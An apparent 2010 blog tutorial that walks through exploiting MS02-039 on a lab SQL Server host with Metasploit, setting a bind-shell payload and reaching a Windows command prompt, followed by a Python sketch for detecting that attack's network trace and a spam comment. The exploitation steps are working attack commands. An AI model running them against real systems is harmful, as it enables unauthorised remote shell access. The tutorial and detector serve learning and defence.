Monday, September 13, 2010

Tutorial: Metasploit Basics 1

Exploiting Vulnerable Server (MS02-039)

Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.101/24 (DEN-WEB1)

Step 1: Switch to Metasploit Framework working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole

Step 2: Search for the mssql pattern and use the correct exploit module (ms02-039)

msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...

msf > info windows/mssql/ms02_039_slammer

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show payloads

msf exploit(ms02_039_slammer) > set PAYLOAD windows/shell/bind_tcp

msf exploit(ms02_039_slammer) > show options

msf exploit(ms02_039_slammer) > set RHOST 131.107.1.101

msf exploit(ms02_039_slammer) > set LHOST 131.107.1.252
msf exploit(ms02_039_slammer) > set LPORT 5555
msf exploit(ms02_039_slammer) > exploit

sniff...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
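
Seen from the defender's side, the session above leaves a recognisable network trace: a lookup sent to the SQL Server Resolution Service on UDP 1434 with an instance name longer than the 32 bytes the MC-SQLR specification allows, followed by a TCP connection from the same source to the bind-shell port (5555). The sketch below is an added example, not part of the original post; the flow records, the 131.107.1.50 client, the port baseline for DEN-WEB1 and the 60-second window are constructed assumptions.

```python
from dataclasses import dataclass

SSRP_PORT = 1434          # SQL Server Resolution Service listens on UDP 1434
CLNT_UCAST_INST = 0x04    # request type: look up one named instance
MAX_INSTANCE_NAME = 32    # longest instance name MC-SQLR allows, in bytes
WINDOW = 60.0             # assumed: seconds to watch for a follow-up connection

@dataclass
class Flow:
    ts: float
    proto: str
    src: str
    dst: str
    dport: int
    payload: bytes = b""

def oversized_lookup(payload: bytes) -> bool:
    """True if a 0x04 lookup carries an instance name longer than 32 bytes."""
    if not payload or payload[0] != CLNT_UCAST_INST:
        return False
    name = payload[1:].split(b"\x00", 1)[0]
    return len(name) > MAX_INSTANCE_NAME

def correlate(flows, baseline):
    """Pair a malformed lookup with a later TCP flow: same source, non-baseline port."""
    alerts, suspects = [], {}
    for f in sorted(flows, key=lambda f: f.ts):
        key = (f.src, f.dst)
        if f.proto == "udp" and f.dport == SSRP_PORT and oversized_lookup(f.payload):
            suspects[key] = f
        elif f.proto == "tcp" and key in suspects:
            first = suspects[key]
            unexpected = f.dport not in baseline.get(f.dst, set())
            if f.ts - first.ts <= WINDOW and unexpected:
                alerts.append((first, f))
    return alerts

# Constructed flow records; the .50 client and the baseline are assumptions.
BASELINE = {"131.107.1.101": {80, 1433}}
SAMPLE_FLOWS = [
    Flow(10.0, "udp", "131.107.1.50", "131.107.1.101", 1434, b"\x04MSSQLSERVER\x00"),
    Flow(12.0, "tcp", "131.107.1.50", "131.107.1.101", 1433),
    Flow(20.0, "udp", "131.107.1.252", "131.107.1.101", 1434, b"\x04" + b"A" * 96),
    Flow(21.5, "tcp", "131.107.1.252", "131.107.1.101", 5555),
]

if __name__ == "__main__":
    for udp, tcp in correlate(SAMPLE_FLOWS, BASELINE):
        print(f"{udp.src}: malformed SSRP lookup, then tcp/{tcp.dport} on {tcp.dst}")
```

Blocking UDP 1434 at the perimeter and applying the MS02-039 patch remove the first half of the pattern entirely; the correlation is for hosts where neither has happened yet.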

1 comment:

  1. Your information for the student has been very helpful in creating the new software. Those things have been very impressive to see with the student.
    Thanks...
    regards, saad from
    Education
